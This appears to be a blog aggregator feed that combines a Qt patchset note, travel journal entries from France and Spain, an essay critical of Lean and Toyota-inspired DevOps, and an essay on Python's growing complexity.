The Commercial Qt 5.15.4 release introduced some bugs that have later been fixed. Thanks to that, our Patchset Collection has been able to incorporate the reverts for those two bugs that affected Android and Windows and the Free Software users will never be affected by those!



Friday, 13 May 2022

Europe Trip Journal – Entry 11: Adiós Amigas

This “morning” I got up at 10:00 after only around 5 hours or so of sleep. Sadly I was not able to extend my stay in the hostel in Barcelona, since the place was booked out, so it was time for me to pack my stuff. After a rather embarrassing self-made breakfast consisting of a chocolate cookie and an energy drink, I moved my backpack into the community area of the hostel and prepared for check-out.

This time I had learned from my mistake and booked a hostel in Madrid for 3 nights over the internet. My train would go at 16:00 which was in a little under 5 hours, so I asked M. if she wanted to venture out into the city with me. She agreed and we went to the Metro station to head out to a place where there was supposed to be a flea market.

The place (I forgot the name unfortunately) turned out to be an artists compound with multiple smaller halls with an art exposition and a small bar. The flea market actually was a second hand shop. I could not resist to try out some ridiculous shirts and I ended up buying 4 of them. Two are colorfully Hawaii shirts, while one is an elegant black piece and the last one shall remain a secret for now 😛 I can assure you though that it is a very fancy piece.

Fancy new shirt, isn’t it?

While we were sifting through the cloth hangers, we met up with M.s friend I. again. She joined our little shopping endeavors for a while. Afterwards we sat down in the sun for a bit. I was telling a story of a bar in Madrid which was a cave where apparently you could order a drink made from alcohol and milk which would come from the ceiling, flowing down some drip stones. I’ll need to visit that place indeed. Eventually we decided to get some lunch in a nearby park and bought some Bocadillas.

And then it slowly got time for me to leave for my train. At the metro station, I said fare-well to M. and entered the metro with I. She left a few stops later, and so then I was on my own again.

At the train station I bought a reservation to Madrid and after following a maze of barriers I boarded the train. During the ride I wrote the last blog post and then watched the landscape that was rushing by outside my window. We were passing impressively steep rock walls and high mountains. Then there were areas which looked like someone stacked hill upon hill, kind of like the way little children draw mountains and valleys. Every now and then there were small Spanish towns scattered across those valleys and I could spot some castles built on rocks and summits.

At some point the sleep deficit showed its effects and I was getting so tired that it became hard not to fall asleep. The seat did not allow me to change into a comfy sleeping position though, so I was stuck in the limbo between being awake and falling asleep.

And then we arrived in Madrid. The train station Atocha seemed more like an airport, having unnecessarily long halls which served no obvious purpose than to contain huge amounts of people and it even had those fast-travel flat escalator-type belts for passengers. When I left through the front entrance, there was a huge pool of taxis waiting on a mutli-lane road, ready to pick up passengers. Personnel was distributing people to the cars to break down the crowd as quickly as possible.

I went by foot though and aimed straight for my hostel which was 20 minutes or so away. I passed a small plaza on which a bunch of children was playing with spray bottles and water-filled balloons. It was great fun.

At the hostel I checked in to quickly stow away my backpack in my room and then I went out again. Without a real plan of where to go first, I somehow ended up on a big plateau between giant palace-like buildings. Here fell into the trap of a sophisticated guilt-based scam attempt by a beggar. I later analyzed his “security exploit”, which was quite interesting:

First he asked for the time, which I gave him. He than told me that he would become a father soon, so he wanted to thank me for telling the time by giving me a bracelet. He insisted on me putting it onto my arm. I later realized that this was likely done to make me feel like I would owe him something back, but since it was harder to take the bracelet off and give it back, I would instead need to default to something else he would requst. Next he handed me a small elephant made of stone. He said something about this being a symbol of his people or so, it was hard to understand him. At this point it was already clear to me that this was an attempt to beg for money, still I fell for it. He was really clever.

Next he told me that since he had done something for me, I would need to do something for him. So he asked for a bit of change to get to his home country. It was now that I was in the morally disadvantageous position of having two items from him. The more or less permanently attached cheap bracelet and the more valuable elephant. Since I could not easily give back the bracelet, I figured the only way out was to give him some few coins. He insisted on more, but I refused. Then he demanded back the elephant and left me feeling guilty, although I totally fell for his trickery. At least now I could take some nice photos of the city.

I continued my way through the city for some more time, but soon decided to go back to the hostel in order to get some much needed sleep.

During the train ride to Madrid, I received some photos M. had taken earlier. One of which is my favorite photo of the tour so far, simply because it was the first picture taken of myself, but not by myself.

Europe Trip Journal – Entry 10: Pub Crawl

While I am typing this, I am already on the train to my next stop, so bare with me while I’m trying to recall all what happened yesterday.

I had mistakenly assumed that my hostel stay would include a breakfast, but instead I was presented with a community kitchen where guests would cook food for themselves. So hungry as I was my first stop was the local Supermercat to get something edible. Being a simple man however, I resorted to cheap instant noodles which back at the hostel I could prepare with water from a water cooker.

I felt a bit cheap compared to the other guests who were preparing full-on meals with avocado, rice and eggs, but this was inexpensive and quick which was important, since I was going to have a video call later the morning.

After the call I took my time watching some Youtube video to finish my meal. Afterwards I asked another guest where to find the dish washer. To my surprise she answered me in German. Turns out she had seen the title of the video I watched earlier. She introduced herself as M. and explained she was from Germany as well. The world is small. M. offered me some of her coffee and explained that later she wanted to go on a club crawl, but she would not have found a non-sketchy offer yet. Then it was time for me to head out to the city. I wished M. a good day and left the hostel.

My plan for today was to further explore the historic part of the city, as well as the Mercat la Boqeria. The best way I can think of to describe the later is that it looks like the hall of a train station, which hosts a permanent funfair, which however only consists of food stands selling weird food. There are stands selling mushrooms, raw fish, crustaceans, ox feet, sweet bakery pieces, all sorts of fried street food, chips, etc. It smells horrible in some places (in my opinion), but its also quite a spectacle.

Afterwards I strolled down the La Rambas, Barcelona’s busiest street. I wanted to go the beach next. The hostel personnel actually had advised me not to go there since it was ugly, but I did not care. Sure, it wasn’t the nicest beach I had ever been to, but I just wanted to relax a bit, sitting in the warm sand. There were lots of merchants patrolling around, announcing they had beer, water, blankets and scarfs for sale. It was a bit annoying, but I guess it is part of the experience.

After an hour or so, I decided I had enough and went back to the hostel. There was some work waiting to be done, and I hadn’t previously tried the co-working space which had a nice sofa. I also tried to extend my stay at the hostel, but unfortunately they were already booked out for the next days ðŸ™�

Later M. arrived back at the hostel. She explained that she had met some other people who knew some good pub crawl. Unfortunately the provider required reservation and only accepted credit cards. Meh. Eventually we agreed upon a time to leave for the crawl together to met up with M.s friend I.

We wanted to meet up at the Magic Fountain, where at this evening was a show with music and lights illuminating the fountain. I’m normally not into such things, but the atmosphere was great. In addition to the lights of the show, people were shooting blinking toys into the air using slingshots. Those then slowly floated down to the floor again. They were selling these toys to tourists all across the place.

After watching the fountain, we wanted to go to the metro to get to the first pub, however on the way our attention was drawn to a big monumental building on which an animation was projected, along with music. Until today we still aren’t really sure what the animation was about. It was something about words of inspiration that were collected from social networks, and about the pandemic. Since there was a timer which was counting down from 7:00 or so, we decided to wait what would come once the timer reached zero, but what followed was an inconclusive clip with a robot voice narrating the animation. And at some point it looped back to the countdown.

We took the train and then arrived at the pub. The organizer told me that I would have to pay in cash to participate in the event, otherwise I would not be allowed to even follow M. and I. Apparently some places had an entry fee which was covered by the ticket price, so I got some money from a nearby ATM and joined the event.

I will spare you of the details, but in summary we went to 4 pubs and bars and later to a club. I would estimate, that my risk of contracting Covid was tenfold higher this evening than it had been the last year. For me the day ended with only 5 hours of sleep, before I would need to check out of the hostel at 11:00 the next day. I now own a wrist-band which quite fittingly reads “I survived Barcelona”.

It was a very good evening.

Thursday, 12 May 2022

DevOps inspiration from Toyota Production System and Lean considered harmful

Note: This text was originally the synopsis for a much longer article which I intended to write as the followup to a lightning talk about the subject I did at my workplace. Acknowledging that I probably won’t get time to write the long version, I think this synopsis can stand pretty well on its own as a statement of intent.

DevOps and DevOps-related practices has become a huge thing in the software industry. Elements of this, such as Continuous Integration and Continuous Deployment and the focus on monitoring production systems and metrics has resulted in large improvements in the handling of large-scale deployments. Especially, the act of deployment to production, in traditional systems often an error-prone process riddled with cataclysmic pitfalls and requiring huge amounts of overtime, is reduced to the trivial pushing of a button which can easily be done in normal office hours.

While the success of DevOps largely rests on technological improvements (containerization, orchestration systems, ease of scaling with cloud technologies) as well as process improvements originating in the Agile methodologies as they have developed since 2001 (with concepts such as pair programming, Test Driven Development and a general focus on automatization), much of the literature on DevOps contain a strong “ideological”, to the point of evangelization, promotion of the underlying philosophies of Lean production and management systems. One very conspicuous feature of this ideology is the canonization of Japanese management methods in general and the Toyota Production System (TPS) in particular as an epitome of thoughtful and benign innovation, empowering workers by incorporating their suggestions, achieving world-class production quality while simultaneously showing the maximum respect for each and every one of the humans involved.

This method (the TPS) was, the story goes, introduced in Western manufacturing and later in management, where its basic principles – improvement circles (kaizen), value stream mapping, Kanban, etc. has streamlined the basic business processes, improved productivity and reduced costs. Now, the narrative continues, DevOps will apply these same Lean lessons in the software industry, and we can expect similar vast improvements of productivity.

It is problematic, however, to try to “learn from Toyota” and from Lean Manufacturing without examining in detail how these work in practice, not least how they affect the people actually working in those systems. The authors behind some of the more popular DevOps introductions – The DevOps Handbook and the novels “The Phoenix Project” and “The Unicorn Project” – do not seem to have actually studied the implications of working under the TPS for Toyota’s Japanese employees in great detail, if at all, and seem to have all of their knowledge of the system from American management literature such as James Womack et al’s “The Machine that Changed the World”, basing their own Lean philosophies entirely on Toyota’s own public relations-oriented descriptions of their system.

This is problematic, since it overlooks the distinction between Toyota’s corporate representation of the intention of their production system – and the actual reality felt by automobile workers on the shop floors. Darius Mehri, who worked at Toyota as a computer simulation engineer for three years, has pointed out that the Western management movements inspired by Toyota have failed to understand a very fundamental distinction in Japanese culture and communication: The distinction between tatemae (that which you are supposed to feel or do) and honne (that which you really feel and do). Mehri posits that all Western proponents of The Toyota Way fail to realize that what they are describing is really the tatemae, what management will tell you and what workers will tell you in a formal context when their words might come back and harm them – while the honne is much grittier, much darker and much more cynical.

In effect, proponents of Lean manufacturing and management styles have imported a kind of double-speak in a Japanese variant, but similar to the all too well-known difference between corporate communcations and what workers will confide in private. By doing so, they have inherited the fundamental lie that the priorities of the TPS are respect for each individual employee, partnership between management and workers, and involvement of each and every employee in the continuous improvement of the workplace; while its true priorities are a maximization of profit through the imposition of frenetic work speeds and very long working hours, discarding workers afflicted by the inevitable accidents and work-related diseases – and an “innovation” mainly driven by imitation of other manufacturers.

The truth about the very Toyota Production System that inspired the Lean movement is, leaving the tatemae aside and looking at the honne, that these factories are driven unusually ruthlessly, with little or no regard for the human costs for the workers on the shop floor. Meetings, security briefings and announcements are routinely made after or before actual working hours, when workers are on their own time. Assembly lines are run at extreme speed in order to increase productivity, resulting in serious accidents, chronic work-related diseases as well as production defects. Even so, production targets are set unrealistically high, and the shop crews are not allowed to go home before they are met, often resulting in several hours of daily overtime. The “improvement circles” do exist and workers are indeed asked to contribute, but the end goal is always to increase production and increase line speed, never to create more humane working conditions on the shop floor. Such improvements are (if at all) introduced more grudgingly, e.g. as a consequence of labor shortages and worker dropout.

Lean, by lauding the TPS and uncritically buying its tatemae, is introducing a similar honne of its own: It is, in reality, not revolutionizing productivity, and for all its fair words does not promote the respect of each worker as an individual. On the contrary, the relentless focus on constant “improvements” and constant demand that each employee rationalizes their work as much as possible has caused it to become known as “management by stress”. It may indeed focus on metrics and may indeed choose metrics to demonstrate its own success – while achieving results that range from average/no change to absolutely dismal.

Proponents of DevOps should stop presenting Toyota as any kind of ideal way of working – literally, a nightmarish grind with workers forced to do ten- or eleven hour shifts, ignoring accidents, running beside old and worn-out machinery in outrageously dangerous conditions is not where we want to go. And the “ideal Toyota” with its “improvement kata” and “mutual respect” never existed except as the tatemae to the cynical honne of shop-floor reality. By importing the tatemae as though it were Truth itself, the Lean movement has imported its double-speak – Lean or “management by stress” transitions can be very unpleasant indeed for employees, and while everything is shrouded in talk of partnership and mutual respect, the underlying motivation will often be money-saving through layoffs – the honne to the Lean management bullshit’s tatemae.

That is to say: Perpetuating the lie about Toyota as a humane, innovative and respectful workplace is positively harmful to the employees and processes afflicted by the proposed improvements, as the double-speak involved will inevitably rub off. The Toyota tatemae was not, after all, designed to be practised literally. Accepting it at face value will only set us up for further double-speak in our own practice.

While the software industry can and should continue to evolve based on the philosophy enshrined in the Agile Manifesto and the improved work processes introduced by DevOps, we should eschew the mendacious narrative of Happy Toyota and reject the Lean philosophies that it founded.

REFERENCES

Heather Barney and Sheila Nataraj Kirby: Toyota Production System/Lean Manufacturing in “Organizational Improvement and Accountability: Lessons for Education from Other Sectors”, RAND Corporation 2004 (online: https://www.jstor.org/stable/10.7249/mg136wfhf.9).

Ian Hampson: Lean Production and the Toyota Production System – Or, the Case of the Forgotten Production Concepts, Economic and Industrial Democracy & 1999 (SAGE, London, Thousand Oaks and New Delhi), Vol. 20: 369-391 (online: https://library.fes.de/libalt/journals/swetsfulltext/6224179.pdf).

Jeffry S. Babb, Jacob Nørbjerg, David J. Yates, Leslie J. Waguespack: The Empire Strikes Back: The End of Agile as we Know it?, paper given at The 40th Information Systems Research Seminar in Scandinavia: IRIS 2017 – Halden, Norway, August 6-9, 2017 (online: https://research-api.cbs.dk/ws/portalfiles/portal/58521158/IRIS_2017_critical_170501_submission.pdf)

Darius Mehri: The Darker Side of Lean: An Insider’s Perspective on the Realities of the Toyota Production System, Academy of Management Perspectives 20, 2, 2006 (online: https://www.jstor.org/stable/4166230)

Stuart D. Green: The Dark Side of Lean Construction: Exploitation and Ideology, proceedings IGLC-7, 1999, 21-32 (online: https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.22.323&rep=rep1&type=pdf)

Satoshi Kamata: Japan in the Passing Lane: : An Insider’s Account of Life in a Japanese Auto Factory, Pantheon Books, New York (1982)

Gregory A. Howell and Glenn Ballard: Bringing Light to the Dark Side of Lean Construction: A Response to Stuart Green, proceedings IGLC-7, 1999, 33-38 (online: https://citeseerx.ist.psu.edu/viewdoc/download;jsessionid=203907F7926472DB31BBE75D290A826B?doi=10.1.1.418.4301&rep=rep1&type=pdf)

Will Johnson: Lean Production – inside the real war on public education, Jacobin Magazine, December 2012 (online: https://www.jacobinmag.com/2012/09/lean-production-whats-really-hurting-public-education/)

Mike Parker: Management-By-Stress, Catalyst Magazine 1, 2, 2017 (online: https://catalyst-journal.com/2017/11/management-by-stress-parker)

Gene Kim, Jez Humble, Patrick Debois and John Willis: The DevOps Handbook, IT Revolution Press, Portland (OR) 2016.

Gene Kim, Kevin Behr and George Spafford: The Phoenix Project, IT Revolution Press, Portland (OR) 2015.

Gene Kim: The Unicorn Project, IT Revolution Press, Portland (OR) 2019.

Phil Ledbetter: Why Do So Many Lean Efforts Fail?, https://www.industryweek.com/operations/continuous-improvement/article/21144299/why-do-so-many-lean-efforts-fail, 20/9-2020.

Enid Mumford: “Sociotechnical Design: An Unfulfilled Promise or a Future Opportunity”, https://link.springer.com/content/pdf/10.1007/978-0-387-35505-4_3.pdf

Wednesday, 11 May 2022

Europe Trip Journal – Entry 9: Cable Cars

Today started with a small hangover. Headache and a sore throat. After some sips of water however, it quickly vanished and it was time for breakfast.

After finding out that the breakfast was served outside the hostel and not inside like Ben and me thought at first, we got to enjoy a croissant, some coffee and a bun with jelly plus a yogurt. That’s cost-effective and tasty 🙂 After breakfast I took a quick shower and than it was time to say farewell. I headed to the train station, while Ben prepared to continue by bike.

At the station, I asked for a reservation for the train to Barcelona and they actually had some available. The train was punctual and the next chapter of my journey began without any problems.

Once seated, I started to get some more work done on my laptop. My goal was to get the prototypical certification implementation going, so I could start cleaning up the code. There were fewer changes required than expected, so I could quickly get started refactoring away. Meanwhile the train rushed over mountains and hasted through tunnels.

When we arrived in Barcelona I first thought it was raining heavily, since the outside of my windows had been dark and grey for the last two stops. Only then I noticed that actually we had been underground for some time. I left the train and walked to the exit, where I was greeted by the sun.

My first impression of Barcelona was that of a Jungle made from City. Houses were standing tightly packed and reached high up in the sky. When it felt like Paris was arrogantly ignoring me, now I felt like Barcelona was the entirety of the Jungle’s wildlife, not taking notice of me for now, but ready to attack at any moment. It wasn’t that I was feared or anything, but there was some feeling of tense excitement.

When I reached the hostel I had picked out during my train ride, they unfortunately told me they were already booked out. But they referred me to another hostel of the same brand, some 20 minutes away. This one fortunately had one(!) bed available. I booked for 2 nights, as the city is so big that it will surely take more than a single day to explore even a fraction of it. I stowed away my backpack and then headed out.

Having spent a week in France, I had to re-adapt my muscle memory when it comes to the language. Suddenly I had to go from French which I learned some years ago in school, to Spanish which I had taken a class for in university not long ago. More than once I accidentally greeted people with “Bonjour”.

Most of Barcelona’s city is aligned along a grid. You can follow a street for kilometers, while the same pattern repeats: Big houses left and right with wide space between for walking or streets, then a crossing and every now and then a street in a 45 (or 35?) degree angle.

The first point of interest I visited was the Sagrada Família. Unfortunately I could not visit from the inside and also not go to the roof, as the booking process was using an app (which did not work for me), or alternatively using a credit card (which I don’t have, I only have debit) ðŸ™� I will try tomorrow to get hold of some tickets in some other way. Maybe one can buy them in some tourist office?

After this semi-disappointment I went to the historic part of the City, the Barri Gotic. While, as I described, most of the city is aligned to the grid, the historic part is not. There is a hard cut and then the houses suddenly stand much closer, the narrow streets are bent around corners and the facades of the buildings seem to lean in towards another. The stark contrast makes it even more beautiful.

There are small, dark alleyways branching off the “main roads”. Here the houses stand so close that you wonder why they even bothered to add windows.

Through this maze, I eventually reached the cathedral of Barcelona, a big church where you can visit the roof to get a nice view of the “skyline” of the city.

From the roof I could spot my next target. At the port area there was a tower from which a cable car was spanning across hundreds of meters to the bottom of a mountain. Originally I thought it was going all the way to the summit, but later found out that there were two distinct cable cars.

I walked all the way to the port and got into the queue for the cable car. When it departed, I got an excellent overview of the city. Unfortunately the photos I took by no means do justice to the experience.

The mountain I was about to “climb”

Off the cable car, I had a few hundred meters left, climbing a steep road all the way to the summit of the mountain. On the way I passed some nice, luxury hotels (the kind you know from James Bond movies), and beautiful parks. There even was a waterfall!

At the summit was a castle, which unfortunately you’d have to pay to visit, so I passed and instead walked the pathway around the castle to get a nice view into the valley and onto the ocean. While the view was breathtaking in person, my photos turned out generic, so I will spare you the photos.

My feet were hurting as hell, so I decided it was time to go back to the hostel. On the way back I came across a big market building which I will check out tomorrow. I also got recommended to visit some market space, but I am not sure if this one was it. We will see.

What I noticed in France, but especially here in Barcelona is that pedestrians take red traffic lights only as a recommendation. People mostly don’t wait for the light to turn green, but instead start pouring onto the street as soon as it is apparent that the last car passed. This goes against my inner German, but I’m slowly adapting. What doesn’t kill you may honk.

Now its time to give my tortured feet some relief and to let the day slowly fade away. Buena noche.

Europe Trip Journal – Entry 8: Perpignan

This post is a bit delayed, since yesterday I did not find the time to write it down.

After spending the night in the hostel in Narbonne, I checked my phone for connections to Barcelona. One suggestion was to go from Narbonne to Port-Bou which is just a few kilometers from the border, already in Spain and to continue from there. During my ride on the train, I checked again and it suggested me to switch trains in Perpignan. Since I had read that name before in the app, I spontaneously decided to leave the train there.

At the train station I went to the ticket office, since I needed a reservation and all online tickets were apparently already sold out. After some waiting in the queue, the person at the help desk told me that I should continue to Port-Bou and go from there, as the TGV which would go from Perpignan to Barcelona directly was cancelled. I rechecked my phone and it did not show me any connections from Port-Bou to Barcelona. The only connections it showed would go back to Perpignan and then from there to Barcelona. Strange.

I entered the queue once again and wanted to ask for confirmation or at least information about the train form Port-Bou. However, this time another employee told me that there was no chance to get from Perpignan to Barcelona today, as all connections were busy. So Perpignan it was for today.

I headed out the train station and located a youth hostel not too far away. I was just about to adjust my backpack when a man who was sitting at a café asked me whether I was staying over night. A bit disoriented I said I was trying to find a place in the youth hostel. Then he told me he was the manager of that hostel and that he could stow away my luggage, as the hostel was currently closed. I was skeptic. What would be the odds of this being a scam?

I replied that it was okay and that I would just hang out somewhere with my luggage until the hostel would open. He nodded and I continued my way.

Perpignan

I found another park where I could lay down in the grass and listen to some podcast. There weren’t many people here, so it was quite a quiet, peaceful place. After 2 hours or so, it was time to continue to the hostel. Et voila! In front of the entrance sat the man from before. It really was the manager 🙂

I booked my room and then head out for a walk. On OpenStreetMaps I had seen a larger area of green which I wanted to check out. However, it turned out there was no quick way there which wouldn’t involve walking over a highway bridge, so at some point I decided to give up and return.

Back at the hostel I grabbed my laptop and went outside to get some work done. The OpenPGP specification was unclear in a few spots and so I opened some tickets to track those issues. Then it was time to relax a bit in a hammock.

The hostel had a hammock!

Later, another guest arrived by bike at the hostel. It turned out his name was B. and he was from Germany as well. He explained that he wanted to travel all the way to South-America with his bike! Impressive. He also wanted to go to Barcelona next.

Later in the evening we went out to get some beers together. After 4 rounds and some chips I felt rich and when the bar closed we went back to the hostel. It was a good evening and I am very thankful for B. to invite me to head out with him 🙂

Monday, 09 May 2022

Europe Trip Journal – Entry 7: Mosquitos

My next stop was Narbonne. Originally I wanted to go from Bordeaux directly to Spain, but there were no train connections. So instead the Interrail app recommended me to cross France to the East to go to Narbonne and then from there South to enter Spain. So that was the plan for today. Unfortunately the train only went a very few times a day, so I had to board it at 14:30, which basically is in the mid of the day, meaning most of the day will be lost. All in all the ride was supposed to take a bit over 3 hours, meaning I would be in Narbonne roughly at 18:00.

In some recent post I was marveling at the punctuality and reliability of french trains. Now I have to revise my statements. I had to buy a reservation for the train and my seat was in cart number 10. Before departure, a stressed out conductor made some announcements in French and after that people around me packed their bags and started to leave the train. I asked another passenger what happened and they told me that there was a technical problem with the cart, so all passengers should leave and wait for the repair technician.

Some minutes passed while I was waiting in the sun together with about 50 other passengers, then the conductor made another announcement. The air conditioning in the cart was broken and we were supposed to split up over the other train carts, told me another passenger. Luckily I found a free seat, which I could occupy for the duration of the ride. Other passengers were not so lucky and either did not find a free seat at all, or had to give it up to other passengers at some point. All this chaos lead to the train departing with a delay of about 40 minutes. When we finally arrived in Narbonne, the delay would have increased to a whole hour.

I did not pay much attention to the landscape outside the window, as I was doing some work on my laptop. Also, I had not gotten a window-seat, so it wasn’t that easy looking out. At some point though I noticed that the landscape outside was drastically changing. The gentle vineyards of Bordeaux were replaced by full-grown mountains and the color of the soil slowly changed to a more red-ish/orange-ish brown. The vegetation was also different, although I lack the vocabulary and knowledge or the Flora to accurately describe it. Basically, suddenly there were those pointy trees which I always associated with the Italian Toskana.

Since now it was already very late afternoon (past 19:00), I figured my chances to find an affordable hostel were quite low, since surely most places were already booked out. And I felt adventurous, so I decided to attempt to go to the beach and find some nice spot where I could spend the night in open air. I had checked the weather report, which stated that temperatures would only drop to around 12°C which I should be able to survive using my blanket and Jacket and extra trousers.

Beautiful, isn’t it?

And so I started walking from the train station down to the coast. OpenStreetMaps reported that it would take around an hour to complete the stretch, but I believe it took me at least 1:30. On my way though I crossed beautiful vineyards and enjoyed the ambience. Arriving at the shore I noticed an issue. Mosquitos. At first I thought it wasn’t too bad. I knew that mosquitos often live near waters, but my hope was that they would somehow fear salty water. Turns out that’s not the case. When I tried to settle down at some acceptable spot, quickly decided to bail as suddenly there were at least 20 mosquitos swarming around my head.

This could have been my resting view, but the stupid mosquitos ruined it �

I tried walking them off, but they followed me. So in the end I had to give up and needed to walk all the way back to the city. Luckily I found a hostel, but unfortunately my stay in Narbonne would be comparably expensive to that in Nantes. At least I have a big bed in my own room again, so I expect to sleep well at last.

Sunday, 08 May 2022

Europe Trip Journal – Entry 6: Laundry Day

Today I took the train to Bordeaux. I had to leave the hostel at 10, so since the train station was only about half an hour away, I had about an hour extra to kill since my train would go at 11:30. So I took some detours on the way, however I still arrived early at the station and had to wait some time.

The train was quite slow compared to high speed trains like the TGV or Thalys I took before. From start to finish the ride took a bit over 2 and a half hours, during which I could notice how the landscape around me was changing. From sparsely standing, low trees and tall grass, the land soon transformed into heavily tree-covered leafy forests, which then turned into mostly coniferous forests which finally gave place to large vineyards. We crossed several metal bridges and passed some nice rural villages. One train station did not even have a platform.

I did a little bit of work during the ride. When processing signatures, PGPainless would accept single signatures, lists of signatures, as well as compressed signatures. The latter actually makes no sense. A cryptographic signature is indistinguishable from randomness, so there is no sense in compressing it, as there would be no decrease in size. The only use for compressed signatures would be for an attacker trying to exploit flaws in the compression algorithm, so I removed support for compressed signatures from PGPainless. Thanks to DemiMarie for pointing this out in a group chat.

On the train it was chilly, they must have had the air conditioning on so I had to get my hoodie. When we finally arrived in Bordeaux however, the air outside was warm enough to go T-shirt only again. The train station Bordeaux Saint-Jean is massive. When I left the building at the front, at first I didn’t notice that what I was now seeing was only about a third of the whole station building. What I thought was the main entrance was just a side wing. I could admire the rest while walking past the station, heading to the river.

Bordeaux is built around the Garonne river. I believe that the name Bordeaux actually comes from “a bord de l’eau”, but I could totally be wrong about this. My hostel was another 5km away from the station, so I had quite a bit of way ahead of me. Along the Garonne, there are parks (surprise!) for sports and relaxation, as well as a nice boulevard for pedestrians. There is even a large, ankle-deep water area which was used by a lot of people to cool down their feet. I too took the opportunity.

Relief for tortured feet

Eventually I arrived at the hostel. I had read on the internet the day before that they had a laundry room. After almost a week of travel I was running low on fresh shirts, so it was about time to do my laundry. The hostel had 3 washing machines along with 3 drying machines, all stacked in a dedicated room. I was told by the receptionist that in order to use them I would have to download an app. Already I feared the worst…

So I went to my room, unpacked my stuff and took my dirty laundry down to the machines. The app was called “AppWash” by Miele. My phone is running LineageOS without proprietary Google Services, so such apps always pose a risk of not working properly for me. Luckily I have a third-party app store which I could use to download the app, and on first sight it didn’t appear to depend on Google services. So lets give it a try!

On first start, the app prompted to enter credentials. At the bottom was a button to click for new users which would trigger the registration. Here I was asked to enter my phone number. Okay, I don’t know what my phone number has to do with my laundry, but lets comply. I entered my number and pressed the “Next” button. Nothing happened. The app displayed a text stating that I should now receive an SMS with a code, but that never arrived. I tried again, nothing. I tried different formats for my phone number, e.g. with “+49” at the start (even though there was a drop-down menu for the country), with prefix “0049”, simply with a “0” as you would type it in Germany, nothing helped. I was annoyed.

Eventually I figured out that the vendor also had a web-app which I could successfully use to register. During the registration process I had to enter not only my phone number, but also my name and my full address. Ever heard of data reduction, Miele? Why do you need my full address when I just want to get my damn laundry cleaned in Bordeaux???

The reason is probably billing. In order to pay for the washing, I had to charge my account in the app with 20€ via PayPal. Then I was finally able select the washing machine that was right in front of me, to start the washing process.

Why have a simple coin slot, when you could have a complicated app system where the user would need to register, giving away their complete personal data and having to remember yet another password, all for the benefit of being digital? Oh, and you now have push messages reminding you to get your laundry out when its ready. As if I could not look at the display at the beginning to note the duration and set a timer… This is stupid. Hello Digitalzwangmelder!

But now I have clean laundry again 🙂

After this I went down the boulevard again. I had not eaten much since the breakfast and my stomach was giving signals. I ended up ordering a big Cesar Salad. Normally I refrain from eating meat when possible, but today I cheated. The chicken strips were nice though, so I don’t regret anything. The salad itself was a bit “sandy” though, and I even found a small piece of gravel on my plate?!? Still, it was tasty (not the gravel), so worth it 🙂

Now I am sitting in the hostels co-working space with a pint of Belgian beer and reflect on the past day, writing this blog post.

At some point during the day I had a thought: You cannot run away from being lonely. Besides some short exceptions, I haven’t really met anyone yet during my travel. Sure, I crossed many people on the road, but the only people I really talked to were friends and family on the phone. Am I lonely? Maybe. But that’s okay for now, I guess.

I don’t feel lonely. Yet.

On forms of apparent progress

Over the years, I have had a few things to say about technological change, churn, and the appearance of progress, a few of them touching on the evolution and development of the Python programming language. Some of my articles have probably seemed a bit outspoken, perhaps even unfair. It was somewhat reassuring, then, to encounter the reflections of a longstanding author of Python books and his use of rather stronger language than I think I ever used. It was also particularly reassuring because I apparently complain about things in far too general a way, not giving specific examples of phenomena for anything actionable to be done about them. So let us see whether we can emerge from the other end of this article in better shape than we are at this point in it.

Now, the longstanding author in question is none other than Mark Lutz whose books “Programming Python” and “Learning Python” must surely have been bestsellers for their publisher over the years. As someone who has, for many years, been teaching Python to a broad audience of newcomers to the language and to programming in general, his views overlap with mine about how Python has become increasingly incoherent and overly complicated, as its creators or stewards pursue some kind of agenda of supposed improvement without properly taking into account the needs of the broadest reaches of its user community. Instead, as with numerous Free Software projects, an unscrutable “vision” is used to impose change based on aesthetics and contemporary fashions, unrooted in functional need, by self-appointed authorities who often lack an awareness or understanding of historical precedent or genuine user need.

Such assertions are perhaps less kind to Python’s own developers than they should be. Those choosing to shoehorn new features into Python arguably have more sense of precedent than, say, the average desktop environment developer imitating Apple in what could uncharitably be described as an ongoing veiled audition for a job in Cupertino. Nevertheless, I feel that language developers would be rather more conservative if they only considered what teaching their language to newcomers entails or what effect their changes have on the people who have written code in their language. Am I being unfair? Let us read what Mr Lutz has to say on the matter:

The real problem with Python, of course, is that its evolution is driven by narcissism, not user feedback. That inevitably makes your programs beholden to ever-shifting whims and ever-hungry egos. Such dependencies might have been laughable in the past. In the age of Facebook, unfortunately, this paradigm permeates Python, open source, and the computer field. In fact, it extends well beyond all three; narcissism is a sign of our times.

You won’t find a shortage of similar sentiments on his running commentary of Python releases. Let us, then, take a look at some experiences and try to review such assertions. Maybe I am not being so unreasonable (or impractical) in my criticism after all!

Out in the Field

In a recent job, of which more might be written another time, Python was introduced to people more familiar with languages such as R (which comes across as a terrible language, but again, another time perhaps). It didn’t help that as part of that introduction, they were exposed to things like this:

    def method(self, arg: Dict[Something, SomethingElse]):
        return arg.items()

When newcomers are already having to digest new syntax, new concepts (classes and objects!), and why there is a “self” parameter, unnecessary ornamentation such as the type annotations included in the above, only increases the cognitive burden. It also doesn’t help to then say, “Oh, the type declarations are optional and Python doesn’t really check them, anyway!” What is the student supposed to do with that information? Many years ago now, Java was mocked for confronting its newcomers with boilerplate like this classic:

    public static void main(String[] args)

But exposing things that the student is then directed to ignore is simply doing precisely the same thing for which Java was criticised. Of course, in Python, the above method could simply have been written as follows:

    def method(self, arg):
        return arg.items()

Indeed, for the above method to be valid in the broadest sense, the only constraint on the nature of the “arg” parameter is that it offer an attribute called “items” that can be called with no arguments. By prescriptively imposing a limitation on “arg” as was done above, insisting that it be a dictionary, the method becomes less general and less usable. Moreover, the nature of Python itself is neglected or mischaracterised: the student might believe that only a certain type would be acceptable, just as one might suggest that the author of that code also fails to see that a range of different, conformant kinds of objects could be used with the method. Such practices discourage or conceal polymorphism and generic functionality at a point when the beginner’s mind should be opened to them.

As Mr Lutz puts such things in the context of a different feature introduced in Python 3.5:

To put that another way: unless you’re willing to try explaining a new feature to people learning the language, you just shouldn’t do it.

The tragedy is that Python in its essential form is a fairly intuitive and readable language. But as he also says in the specific context of type annotations:

Thrashing (and rudeness) aside, the larger problem with this proposal’s extensions is that many programmers will code them—either in imitation of other languages they already know, or in a misguided effort to prove that they are more clever than others. It happens. Over time, type declarations will start appearing commonly in examples on the web, and in Python’s own standard library. This has the effect of making a supposedly optional feature a mandatory topic for every Python programmer.

